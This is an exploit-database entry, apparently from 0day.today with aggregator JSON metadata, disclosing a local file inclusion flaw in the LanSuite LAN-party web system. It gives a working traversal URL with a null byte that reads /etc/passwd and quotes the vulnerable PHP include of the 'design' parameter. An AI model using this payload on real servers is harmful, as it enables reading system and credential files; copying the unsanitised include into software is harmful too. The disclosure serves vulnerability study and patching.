ID 1337DAY-ID-3751
Type zdt
Reporter dun
Modified 2008-09-25T00:00:00
Description
Exploit for unknown platform in category web applications
==========================================================
LanSuite 3.3.2 (design) Local File Inclusion Vulnerability
==========================================================
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun ]
##########################################################################
# [ lansuite <= 3.4 beta r1363 ] Local File Inclusion Vulnerability #
##########################################################################
#
# Script: "Lansuite - Webbased LAN-Party Management System"
#
# Script site: http://lansuite.orgapage.de
# Download: http://sourceforge.net/project/showfiles.php?group_id=105885
#
# Vuln:
# http://site.com/[lansuite-3.4_beta_r1363]/index.php?design=../../../../../../../../../../etc/passwd%00
#
#
# Bug: ./lansuite-3.4_beta_r1363/index.php (lines: 243-254)
#
# ...
# if (!$auth["design"]) $auth["design"] = "simple";
# if (!file_exists("design/{$auth["design"]}/templates/index.php")) $auth["design"] = "simple";
# $_SESSION["auth"]["design"] = $auth["design"];
# if ($_GET['design'] and $_GET['design'] != 'popup' and $_GET['design'] != 'base') $auth['design'] = $_GET['design']; // [1]
#
# // Statistic Functions (for generating server- and usage-statistics)
# if ($db->success) $stats = new stats();
#
# // Boxes
# if (!$IsAboutToInstall and !$_GET['contentonly'] and $_GET['design'] != 'base') include_once("modules/boxes/class_boxes.php");
#
# if ($_GET['design'] != 'base') include_once('design/'. $auth['design'] .'/templates/index.php'); // [2] LFI
# ...
#
#
###############################################
[ dun / 2008 ]
*******************************************************************************************
# 0day.today [2018-04-04] #
{"published": "2008-09-25T00:00:00", "id": "1337DAY-ID-3751", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:07:55", "bulletin": {"published": "2008-09-25T00:00:00", "id": "1337DAY-ID-3751", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T02:07:55", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/"}}, "hash": "733cc97969b48342e1984bfa110ebc9198209c29ef287715d1427e156f4ff568", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T02:07:55", "edition": 1, "title": "LanSuite 3.3.2 (design) Local File Inclusion Vulnerability", "href": "http://0day.today/exploit/description/3751", "modified": "2008-09-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/3751", "references": [], "reporter": "dun", "sourceData": "==========================================================\r\nLanSuite 3.3.2 (design) Local File Inclusion Vulnerability\r\n==========================================================\r\n\r\n\r\n :::::::-. ... ::::::. :::.\r\n ;;, `';, ;; ;;;`;;;;, `;;;\r\n `[[ [[[[' [[[ [[[[[. '[[\r\n $$, $$$$ $$$ $$$ \"Y$c$$\r\n 888_,o8P'88 .d888 888 Y88\r\n MMMMP\"` \"YmmMMMM\"\" MMM YM\r\n\r\n [ Discovered by dun ]\r\n\r\n ##########################################################################\r\n # [ lansuite <= 3.4 beta r1363 ] Local File Inclusion Vulnerability #\r\n ##########################################################################\r\n #\r\n # Script: \"Lansuite - Webbased LAN-Party Management System\"\r\n #\r\n # Script site: http://lansuite.orgapage.de\r\n # Download: http://sourceforge.net/project/showfiles.php?group_id=105885\r\n #\r\n # Vuln: \r\n # http://site.com/[lansuite-3.4_beta_r1363]/index.php?design=../../../../../../../../../../etc/passwd%00\r\n # \r\n #\r\n # Bug: ./lansuite-3.4_beta_r1363/index.php (lines: 243-254)\r\n #\r\n # ...\r\n #\tif (!$auth[\"design\"]) $auth[\"design\"] = \"simple\";\r\n #\tif (!file_exists(\"design/{$auth[\"design\"]}/templates/index.php\")) $auth[\"design\"] = \"simple\";\r\n #\t$_SESSION[\"auth\"][\"design\"] = $auth[\"design\"];\r\n #\tif ($_GET['design'] and $_GET['design'] != 'popup' and $_GET['design'] != 'base') $auth['design'] = $_GET['design']; // [1]\r\n #\r\n #\t// Statistic Functions (for generating server- and usage-statistics)\r\n #\tif ($db->success)\t$stats = new stats();\r\n #\r\n #\t// Boxes\r\n #\tif (!$IsAboutToInstall and !$_GET['contentonly'] and $_GET['design'] != 'base') include_once(\"modules/boxes/class_boxes.php\");\r\n #\r\n #\tif ($_GET['design'] != 'base') include_once('design/'. $auth['design'] .'/templates/index.php'); \t\t\t // [2] LFI\r\n # ... \t\t\t \r\n #\r\n #\r\n ###############################################\r\n\r\n [ dun / 2008 ] \r\n\r\n*******************************************************************************************\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "de9f9940935ed9cfe13b64177e4ad2ec", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d76a9d72215eafe8d07542d4a1287070", "key": "href"}, {"hash": "5283bcbb98fd928fee88ff03f736500c", "key": "published"}, {"hash": "c85a774b0fb2d415c02759c5401abafa", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b89d9cbe507a01c3b78cba67642f2ba2", "key": "reporter"}, {"hash": "5283bcbb98fd928fee88ff03f736500c", "key": "modified"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "c6199559ff1b227e40e1f1b436b4c347", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "2c8712131551bbf3bf1af4591d83d4d024d93b59728c4abe131fe8cce7b6c4d2", "enchantments": {"vulnersScore": 9.3}, "type": "zdt", "lastseen": "2018-04-04T17:31:14", "edition": 2, "title": "LanSuite 3.3.2 (design) Local File Inclusion Vulnerability", "href": "https://0day.today/exploit/description/3751", "modified": "2008-09-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/3751", "references": [], "reporter": "dun", "sourceData": "==========================================================\r\nLanSuite 3.3.2 (design) Local File Inclusion Vulnerability\r\n==========================================================\r\n\r\n\r\n :::::::-. ... ::::::. :::.\r\n ;;, `';, ;; ;;;`;;;;, `;;;\r\n `[[ [[[[' [[[ [[[[[. '[[\r\n $$, $$$$ $$$ $$$ \"Y$c$$\r\n 888_,o8P'88 .d888 888 Y88\r\n MMMMP\"` \"YmmMMMM\"\" MMM YM\r\n\r\n [ Discovered by dun ]\r\n\r\n ##########################################################################\r\n # [ lansuite <= 3.4 beta r1363 ] Local File Inclusion Vulnerability #\r\n ##########################################################################\r\n #\r\n # Script: \"Lansuite - Webbased LAN-Party Management System\"\r\n #\r\n # Script site: http://lansuite.orgapage.de\r\n # Download: http://sourceforge.net/project/showfiles.php?group_id=105885\r\n #\r\n # Vuln: \r\n # http://site.com/[lansuite-3.4_beta_r1363]/index.php?design=../../../../../../../../../../etc/passwd%00\r\n # \r\n #\r\n # Bug: ./lansuite-3.4_beta_r1363/index.php (lines: 243-254)\r\n #\r\n # ...\r\n #\tif (!$auth[\"design\"]) $auth[\"design\"] = \"simple\";\r\n #\tif (!file_exists(\"design/{$auth[\"design\"]}/templates/index.php\")) $auth[\"design\"] = \"simple\";\r\n #\t$_SESSION[\"auth\"][\"design\"] = $auth[\"design\"];\r\n #\tif ($_GET['design'] and $_GET['design'] != 'popup' and $_GET['design'] != 'base') $auth['design'] = $_GET['design']; // [1]\r\n #\r\n #\t// Statistic Functions (for generating server- and usage-statistics)\r\n #\tif ($db->success)\t$stats = new stats();\r\n #\r\n #\t// Boxes\r\n #\tif (!$IsAboutToInstall and !$_GET['contentonly'] and $_GET['design'] != 'base') include_once(\"modules/boxes/class_boxes.php\");\r\n #\r\n #\tif ($_GET['design'] != 'base') include_once('design/'. $auth['design'] .'/templates/index.php'); \t\t\t // [2] LFI\r\n # ... \t\t\t \r\n #\r\n #\r\n ###############################################\r\n\r\n [ dun / 2008 ] \r\n\r\n*******************************************************************************************\r\n\r\n\r\n\n# 0day.today [2018-04-04] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "886cf03db029685c7f8f21a346648cbb", "key": "href"}, {"hash": "5283bcbb98fd928fee88ff03f736500c", "key": "modified"}, {"hash": "5283bcbb98fd928fee88ff03f736500c", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b89d9cbe507a01c3b78cba67642f2ba2", "key": "reporter"}, {"hash": "0aeb2b7f338bcca29f58e8a79271c7b7", "key": "sourceData"}, {"hash": "d2224c9c7146b621f1a482c6eda7ce73", "key": "sourceHref"}, {"hash": "c6199559ff1b227e40e1f1b436b4c347", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"result": {}}
